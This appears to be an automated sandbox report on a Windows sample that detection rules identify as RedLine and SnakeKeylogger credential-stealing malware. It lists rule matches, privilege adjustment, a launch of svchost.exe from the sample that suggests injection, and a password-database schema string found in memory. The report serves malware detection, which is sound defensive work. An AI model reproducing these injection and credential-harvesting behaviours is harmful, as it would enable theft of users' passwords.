Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904D9D8	2_2_0904D9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09040006	2_2_09040006
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904F832	2_2_0904F832
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09045038	2_2_09045038
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09040040	2_2_09040040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904F840	2_2_0904F840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904FC98	2_2_0904FC98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904CCC0	2_2_0904CCC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904CCD0	2_2_0904CCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904EB29	2_2_0904EB29
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09040B2B	2_2_09040B2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904EB38	2_2_0904EB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09049358	2_2_09049358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904EF80	2_2_0904EF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904EF90	2_2_0904EF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904179F	2_2_0904179F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09048BB1	2_2_09048BB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09048BC0	2_2_09048BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904F3D7	2_2_0904F3D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904F3E8	2_2_0904F3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904DE1F	2_2_0904DE1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904DE30	2_2_0904DE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904E27A	2_2_0904E27A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904E288	2_2_0904E288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_09041E8A	2_2_09041E8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904E6D0	2_2_0904E6D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0904E6E0	2_2_0904E6E0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: String function: 00628900 appears 42 times
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: String function: 00620AE3 appears 70 times
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: String function: 00607DE1 appears 35 times

Source: lsc5QN46NH.exe, 00000000.00000003.1513701856.000000000407D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs lsc5QN46NH.exe
Source: lsc5QN46NH.exe, 00000000.00000003.1514489770.0000000003ED3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs lsc5QN46NH.exe
Source: lsc5QN46NH.exe, 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs lsc5QN46NH.exe

Source: lsc5QN46NH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.lsc5QN46NH.exe.21a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0066A06A GetLastError,FormatMessageW,

0_2_0066A06A

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006581CB AdjustTokenPrivileges,CloseHandle,		0_2_006581CB
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006587E1

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0066B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0066B333

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0067EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0067EE0D

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_006783BB

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00604E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00604E89

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

File created: C:\Users\user\AppData\Local\Temp\aut8912.tmp

Jump to behavior

Source: lsc5QN46NH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000002.3934335927.00000000055B0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703350152.0000000006457000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055BE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lsc5QN46NH.exe	Virustotal: Detection: 31%
Source: lsc5QN46NH.exe	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\lsc5QN46NH.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
